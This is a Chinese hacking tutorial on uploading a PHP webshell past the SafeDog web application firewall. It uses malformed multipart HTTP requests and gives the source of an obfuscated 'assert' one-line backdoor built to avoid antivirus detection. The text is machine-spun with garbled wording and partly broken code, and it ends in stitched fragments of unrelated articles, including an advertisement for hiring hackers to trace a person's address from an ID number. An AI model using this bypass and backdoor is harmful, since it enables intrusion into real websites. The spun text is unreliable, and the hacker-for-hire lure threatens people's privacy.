这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的办法。
思路是:修正HTTP恳求,构成变形HTTP恳求,然后绕过网站安全狗的检测。
废话不多说,切入正题。。。。
1、试验环境:
Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048
2、用于文件上传的PHP源码:
$path = dirname(__FILE__) . '/upload/';
$rand = rand(0,30);
move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);
echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "";
echo "OK";
?>
由于此次试验的意图是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。
3、先看一下正常的HTTP恳求:
很明显,文件名为”yijuhua.php”被阻拦。。。。
4、测验%00切断:
很明显,失利了。。。
5、修正HTTP恳求,结构变形HTTP恳求
(1)删去实体里边的Conten-Type字段:
绕过网站安全狗的阻拦,成功上传WebShell。。。
(2)删去Content-Disposition字段里的空格:
(3)修正Content-Disposition字段值的大小写:
6、菜刀衔接一句话:
到此,上传WebShell完毕,各位看理解了吗?
7、免杀PHP一句话:
/*
PHP一句话木马
assert($string)
*/
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i
$func .= $func . $arr[$i];
}
$func($_REQUEST['c']);
?>
8、修正缝隙:
呈现这种状况,我认为是网站安全狗在开发时没有考虑到变形HTTP恳求,而Apache却兼容变形HTTP恳求,所以可以上传成功。
Powershell与.NET进犯运用时间线一、 紧跟缝隙开展脚步二、 活泼宗族实际上,这些歹意安排的技能水平和运营手法,决议了他们在得知自己现已进入公众视界之后所作出的反响。 有些歹意安排会直接抛弃...
今日给咱们介绍的是一款名叫NagaScan的针对Web运用程序的分布式被迫缝隙扫描器,NagaScan现在支撑包括XSS、SQL注入、以及文件包括等缝隙。 NagaScan的运转机制 首要NagaSc...
html>head>/head>body data-feedly-mini="yes">Load evi1m0 Fail!/body>/html>这工作还要从几天前...
Spear Phish 是用来邮件垂钓的模块。 [1][2][3][4]黑客接单渠道Coldfusion 9 后台拿webshell-M 5678参数,担任经过5678端口监督衔接状况,衔接有问题时就...
「学新网_找黑客查地址要多少钱-黑客教你身份证找地址」1、到Google搜索,site:cq.cn inurl:asp翻开浏览器,输入供给的网址,翻开实验文件下载页面,点击 [web.exe] 进行下...
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86...